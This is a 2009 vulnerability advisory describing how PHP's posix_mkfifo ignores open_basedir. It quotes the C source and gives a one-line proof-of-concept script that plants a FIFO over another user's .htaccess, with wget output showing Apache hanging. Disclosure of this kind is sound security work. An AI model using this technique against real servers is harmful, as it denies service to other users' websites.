[ PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ] Author: Grzegorz Stachowiak Date: - - Dis.: 25.09.2009 - - Pub.: 29.09.2009 Risk: Low Affected Software: - - PHP 5.3.0 - - PHP 5.2.11 and prior - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/function.posix-mkfifo.php - --- 1. PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass --- posix_mkfifo — Create a fifo special file (a named pipe) posix_mkfifo() creates a special FIFO file which exists in the file system and acts as a bidirectional communication endpoint for processes. Function not check open_basedir value, so we can create any file in any writable folder, if open_basedir is enabled. We can "freeze" Apache and prevent access to any writable folder. - ---ext/posix/posix.c--- PHP_FUNCTION(posix_mkfifo) { char *path; int path_len; long mode; int result; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl", &path, &path_len, &mode) == FAILURE) { RETURN_FALSE; } if (PG(safe_mode) && (!php_checkuid(path, NULL, CHECKUID_ALLOW_ONLY_DIR))) { [1] RETURN_FALSE; } result = mkfifo(path, mode); if (result < 0) { POSIX_G(last_error) = errno; RETURN_FALSE; } RETURN_TRUE; } - ---ext/standard/file.c--- [1]. Function posix_mkfifo check only safe_mode value. - ---example0 (5.2.11/5.3.0)--- x@x-desktop:/var/www/$ php -v PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies |----------------------------------------------------------------| x@x-desktop:/var/www$ php -r "echo ini_get('open_basedir').PHP_EOL; /var/www:/tmp x@x-desktop:/var/www$ |----------------------------------------------------------------| x@x-desktop:/var/www$ cat fifo.php <? posix_mkfifo('/home/y/www/.htaccess',0777); ?> |----------------------------------------------------------------| x@x-desktop:/var/www$ wget http://localhost/config.txt --17:39:31-- http://localhost:80/config.txt => `config.txt' Connecting to localhost:80... connected! HTTP request sent, awaiting response... 200 OK Length: 25 [text/plain] 0K -> [100%] (24.41 KB/s) - `config.txt' saved [25/25] |----------------------------------------------------------------| x@x-desktop:/var/www$ php fifo.php x@x-desktop:/var/www$ |----------------------------------------------------------------| x@x-desktop:/var/www$ wget http://localhost/config.txt --17:39:43-- http://localhost:80/config.txt => `config.txt' Connecting to localhost:80... connected! HTTP request sent, awaiting response... |----------------------------------------------------------------| Apache try receive access to .htaccess file, but fifo special file not allow a "normal" read, so we can't read files in this directory and all subdirectories. - --- 3. Contact --- Author: Grzegorz Stachowiak Email: stachowiak {a|t} analogicode.pl